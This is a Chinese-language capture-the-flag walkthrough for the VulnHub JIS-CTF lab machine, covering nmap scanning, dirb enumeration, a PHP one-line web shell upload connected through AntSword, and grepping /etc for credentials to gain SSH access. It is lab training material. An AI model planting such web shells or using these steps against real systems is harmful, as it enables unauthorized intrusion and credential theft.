项目地址
https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/
修改靶机的网卡
开机时长按shift,进入此页面
选择第二个,进入
等待加载完成
选择root模式进入
将只读模式改为读写模式
mount -o remount,rw /
查看本机的网卡名称
ifconfig -a
修改默认网卡
vi /etc/network/interfaces
wq!保存退出,reboot重启即可
实验过程
将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机
使用nmap进行主机发现,获取靶机IP地址
nmap 192.168.47.1-254
根据对比可知JIS-CTF的一个ip地址为192.168.47.144
扫描JIS-CTF的操作系统,端口及对应服务
nmap -A -p- 192.168.47.144
发现开放22端口和80端口
访问网站
进入了一个登录界面
但是不知道账号密码
对网站进行目录枚举
dirb http://192.168.47.144
发现存在一个robots.txt和一个flag网站
访问一下
访问http://192.168.47.144/flag
得到了第一个flag
访问http://192.168.47.144/robots.txt
对文件中的网站进行逐一访问
只在/admin_area网站里面存在一句话
存疑,感觉有问题
查看网站的源码
得到了第二个flag以及一个账号密码
回到登陆界面尝试登录
成功登录
发现可以上传文件
写一个一句话木马上传
<?php eval($_POST['cmd']); ?>
上传成功
通过robots.txt可知,文件上传到uploaded_files里面
蚁剑连接
连接成功
寻找文件
发现了一个flag.txt
打开是空的
使用命令查看
没有权限
再看看其他的
在hint.txt发现了第三个flag
文件里面提到尝试使用 technawi 用户名和密码 来查看flag.txt文件
之前扫描ip开放了22端口
尝试使用ssh进行连接
发现需要密码
在蚁剑里面寻找一下
cat /etc/passwd
x说明密码在shadow里面保存
没有权限访问被拒
尝试扫描关键字来查找密码
grep -r technawi /etc/
扫到了,在credentials.txt文件里
得到了第四个flag以及ssh的登录账号密码
ssh连接
连接成功
直接访问html目录下的flag.txt
cat /var/www/html/flag.txt